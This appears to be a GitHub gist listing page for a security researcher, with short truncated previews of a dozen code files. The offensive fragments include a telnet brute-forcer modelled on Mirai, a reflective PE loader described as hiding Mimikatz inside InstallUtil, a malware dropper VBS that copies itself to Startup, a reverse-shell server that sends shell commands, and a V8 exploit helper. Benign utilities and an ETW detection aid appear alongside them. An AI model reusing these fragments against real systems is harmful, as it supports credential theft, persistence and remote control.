This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # co-occurence matrix & cos-similarity, by aaaddress1@chroot.org | |
| testSample = 'adr have 30cm and shenghao have 30cm' | |
| in_sample = testSample.split() | |
| corups = set(in_sample) | |
| co_matrix = { x: dict.fromkeys(corups, 0) for x in corups } | |
| win_size = 1 | |
| for indx, curr_token in enumerate(in_sample): | |
| if indx - win_size >= 0: |
aaaddress1
/ mirai_sanner.py
Created
April 15, 2020 14:33
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Telnet Bruteforce in Python, by aaaddress1@chroot.org | |
| # ref: https://github.com/jgamblin/Mirai-Source-Code | |
| import socket | |
| import sys | |
| s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
| s.connect(('10.118.127.36', 23)) | |
| #s.send(b'\xff\xfc\x23\xff\xfa\x1f\x00\xa0\x00\x39\xff\xf0\xff\xfd\x01') |
aaaddress1
/ PELoader.cs
Created
July 19, 2020 15:46
— forked from xorrior/PELoader.cs
Reflective PE Loader - Compressed Mimikatz inside of InstallUtil
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.IO; | |
| using System.IO.Compression; | |
| using System.Text; | |
| using System.Collections.Generic; | |
| using System.Configuration.Install; | |
| using System.Runtime.InteropServices; | |
aaaddress1
/ garenaMalwareDropper.vbs
Created
March 3, 2018 10:56
Garena Malware Dropper (2018/03/03)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Dim Wsh | |
| Set Wsh = Wscript.CreateObject("Wscript.Shell") | |
| Dim Objectfs | |
| Set Objectfs = CreateObject("Scripting.FileSystemObject") | |
| set fso = createobject("scripting.filesystemobject") | |
| set ws = createobject("wscript.shell") | |
| pt = ws.specialfolders("startup") & "\" | |
| set file = fso.getfile(wscript.scriptfullname) | |
| If Objectfs.FileExists(pt & "r.vbe") Then | |
| else |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // dynamic patch self function by aaaddress1@chroot.org | |
| #include <windows.h> | |
| #include <algorithm> | |
| #include <iterator> | |
| using namespace std; | |
| void hello() | |
| { | |
| puts("Are You Helloing?"); | |
| } | |
| int main(void) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ''' | |
| Cmd Multiple RevShell Server by aaaddress1@chroot.org | |
| [test] $ ncat localhost 54321 | cmd | |
| ''' | |
| import time, socket | |
| def handleClient(connection): | |
| try: | |
| time.sleep(1) | |
| connection.send(b'whoami && echo 123 > ggdada.txt && exit\n') | |
| except Exception as e: |
aaaddress1
/ chrome-v8-issue-1126249.js
Created
March 22, 2021 03:38
— forked from hkraw/chrome-v8-issue-1126249.js
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| class Helpers { | |
| constructor() { | |
| this.cvt_buf = new ArrayBuffer(8); | |
| this.cvt_f64a = new Float64Array(this.cvt_buf); | |
| this.cvt_u64a = new BigUint64Array(this.cvt_buf); | |
| this.cvt_u32a = new Uint32Array(this.cvt_buf); | |
| } | |
| ftoi(f) { |
aaaddress1
/ m1racles-poc.c
Created
June 1, 2021 14:10
— forked from marcan/m1racles-poc.c
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| * m1racle-poc: a basic proof of concept for the M1RACLES vulnerability in the Apple M1. | |
| * | |
| * This program allows you to read and write the state of the s3_5_c15_c10_1 CPU register. | |
| * | |
| * Please visit m1racles.com for more information. | |
| * | |
| * Licensed under the MIT license. | |
| */ |
aaaddress1
/ inputLockToZhTW.cpp
Created
June 2, 2021 13:26
swich IME (Input Method Editor) to Zh-TW chinese on specific window
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // [Experiment] swich IME to Traditional Chinese | |
| // $ g++ -m32 -static inputLockToZhTW.cpp && a | |
| // test on League of Legends (TW) client, but got ignored :( | |
| // by aaaddress1@chroot.org | |
| #include <windows.h> | |
| #include <iostream> | |
| int main(void) { | |
| for (char buf[64]; ; Sleep(150)) { | |
| GetWindowTextA(GetForegroundWindow(), buf, sizeof(buf)); | |
| // once found that LOL client is on the top, and send IME change requests |
aaaddress1
/ dotnet-runtime-etw.py
Created
June 22, 2021 15:08
— forked from countercept/dotnet-runtime-etw.py
A research aid for tracing security relevant events in the CLR via ETW for detecting malicious assemblies.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import time | |
| import etw | |
| import etw.evntrace | |
| import sys | |
| import argparse | |
| import threading | |
| class RundownDotNetETW(etw.ETW): | |
| def __init__(self, verbose, high_risk_only): |